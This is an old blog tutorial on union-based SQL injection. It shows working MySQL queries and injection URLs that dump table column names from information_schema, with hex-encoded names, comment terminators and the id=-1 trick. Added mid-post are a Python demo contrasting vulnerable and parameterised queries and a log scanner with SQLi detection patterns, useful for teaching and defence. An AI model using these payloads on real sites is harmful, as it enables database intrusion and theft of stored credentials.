Monday, July 2, 2012

Dumping The Columns Of A Table

Okay, so now that we know how to find the table names, let's try to find the columns in those tables.

From our last post we know that the database has three tables:

admin, products, users

And our URL:

www.example.com/index.php?id=1

Let's change the URL for better understanding: assume we are on the Products page of the website, where a given product id displays the information related to that id.

So, www.example.com/products.php?id=1

So in the backend database it's something like this:

mysql> select id, product, price from products where id=1;

+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

We know from the earlier posts that the column count used is three.

Now we will see the magic: the query runs against the products table, but from inside that query we will try dumping data from the other tables in the database.

So let's check the simulation first on the MySQL server.

We will split the query:

SELECT id, product, price FROM products WHERE id = <user input>;

The left-hand side is the developer's code, and the pentester has to work on the right-hand side.

We know that the query below will show the tables in the database:

mysql> select * from products where id=1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

So let's say we are interested in the admin table. What do we have to do now? We have to find the columns in the admin table.

The 'information_schema' database has a table named 'columns' whose 'column_name' column holds the column names for all the tables in every database. So we will use the 'information_schema' database once again to find the columns in the table 'admin' of the database 'ckorner':

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we get the columns of 'admin' in the 'ckorner' database. Let's try the other tables in the 'ckorner' database:

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='products';
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | id      |
|    1 | 2       | product |
|    1 | 2       | price   |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='users';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we see that it easily dumps the column names of the other tables (admin, users), despite being inside a query that is supposed to show only the contents of the 'products' table.

So now we will put our built queries in the URL:
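The mechanism behind the UNION trick above is that products.php pastes the id parameter straight into the SQL text, so the database cannot tell the developer's query from the pentester's input. The following is an added example, not code from the original post or from any real site: it rebuilds the 'ckorner' schema in an in-memory SQLite database (a stand-in for MySQL, so it runs offline; SQLite has no information_schema, so the constructed payload reads column names from pragma_table_info('admin'), which needs SQLite 3.16 or newer), and shows the vulnerable string-concatenated lookup next to the same lookup with a bound parameter. With the bound parameter the whole input is treated as a value, so the injected UNION never becomes SQL and no rows come back.

```python
import sqlite3

# Constructed stand-in for the 'ckorner' database from the post (SQLite in memory).
# Table and column names match the post; the row contents are made up.
SCHEMA = """
CREATE TABLE products (id INTEGER, product TEXT, price INTEGER);
CREATE TABLE admin    (id INTEGER, name TEXT, pwd TEXT);
CREATE TABLE users    (id INTEGER, name TEXT, pwd TEXT);
INSERT INTO products VALUES (1, 'printer', 2500);
"""

# The post's payload, adapted to SQLite: pragma_table_info('admin') plays the
# role of information_schema.columns WHERE table_name='admin'.
SQLITE_UNION_PAYLOAD = "1 union select 1,2,name from pragma_table_info('admin')"


def open_db():
    """Create the sample database; every call returns a fresh copy."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, user_input):
    """What products.php effectively does: the id parameter is glued into the SQL.

    Anything the client sends after the number becomes part of the statement.
    """
    sql = "SELECT id, product, price FROM products WHERE id=" + user_input
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, user_input):
    """Same query with a bound parameter: the input is data, never SQL.

    SQLite (like MySQL with prepared statements) compares the column with the
    whole string; '1 union select ...' is not a number, so nothing matches.
    """
    sql = "SELECT id, product, price FROM products WHERE id=?"
    return conn.execute(sql, (user_input,)).fetchall()


def leaked_column_names(rows):
    """Pull the third column out of the injected rows (those with 2 in the product slot)."""
    return sorted(row[2] for row in rows if row[1] == 2)


if __name__ == "__main__":
    db = open_db()
    print("normal request      :", hardened_lookup(db, "1"))
    print("vulnerable + payload:", vulnerable_lookup(db, SQLITE_UNION_PAYLOAD))
    print("leaked admin columns:", leaked_column_names(vulnerable_lookup(db, SQLITE_UNION_PAYLOAD)))
    print("hardened + payload  :", hardened_lookup(db, SQLITE_UNION_PAYLOAD))
```

The hardened version is the fix, not an add-on: escaping quotes (which is why the post falls back to hex literals) leaves the numeric id path wide open, whereas a bound parameter makes the database parse the statement before it ever sees the value.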

www.example.com/products.php?id=1

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name='admin'

It didn't dump. Reason? Remember I said that in the URL the string parameters have to be hex encoded. You can encode the parameter 'admin' with online tools, or you can use our tool to hex encode the parameters.

Download Link: Click Here

The hex encoding of 'admin' is: 0x61646d696e

Are we still missing something? Remember the comment symbol?

We have to comment out the rest of the query being passed, so that by the time the query reaches the database the remaining part is ignored.

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

In some cases, if it doesn't work, you need to change the id value to an id that doesn't exist in the table, like 9999 or -1. Using -1 is a sure-shot value for dumping, as there would be no records with the value -1.

www.example.com/products.php?id=-1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

And this outputs the column names of the table 'admin'.

That's all for this post; hope this was informative.
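From the defender's side, the two details the post relies on (hex-encoded string literals and a trailing `--+` comment) are exactly what a log rule should normalise away before matching. The following is an added example, not part of the original post: it scans a few constructed web-server log lines, URL-decodes the query string, turns MySQL `0x...` literals back into ASCII, and reports which indicators fire. The log lines, IP addresses and rule names are all made up for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (common log format); not from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jul/2012:10:00:01 +0000] "GET /products.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [02/Jul/2012:10:00:09 +0000] "GET /products.php?id=1%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20--+ HTTP/1.1" 200 731
203.0.113.5 - - [02/Jul/2012:10:00:15 +0000] "GET /products.php?id=-1+union+select+1,2,column_name+from+information_schema.columns+where+table_name=0x61646d696e+--+ HTTP/1.1" 200 640
198.51.100.7 - - [02/Jul/2012:10:01:00 +0000] "GET /products.php?id=42 HTTP/1.1" 200 510
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})\b")

# Indicator rules, evaluated on the decoded and hex-normalised query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
}


def decode_hex_literals(text):
    """Replace MySQL 0x... literals with their ASCII value so 'admin' is visible to the rules."""
    def repl(match):
        try:
            return bytes.fromhex(match.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)          # not printable ASCII: leave it alone
    return HEX_LITERAL_RE.sub(repl, text)


def analyse_request(request_target):
    """Return the sorted list of indicator names that fire on one request target."""
    query = unquote_plus(urlsplit(request_target).query)   # %20 and '+' both become spaces
    findings = []
    if HEX_LITERAL_RE.search(query):
        findings.append("hex_literal")
    normalised = decode_hex_literals(query)
    for name, rule in INDICATORS.items():
        if rule.search(normalised):
            findings.append(name)
    return sorted(findings)


def scan_log(log_text):
    """Return (client_ip, request_target, findings) for every line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = analyse_request(match.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], match.group(1), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings), target, sep="  ")
```

Decoding before matching is the point: a rule that looks for the literal string 'admin' misses the hex form, and one that looks for `--` followed by a space misses `--+` until the plus sign has been turned back into a space.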

Thank You!
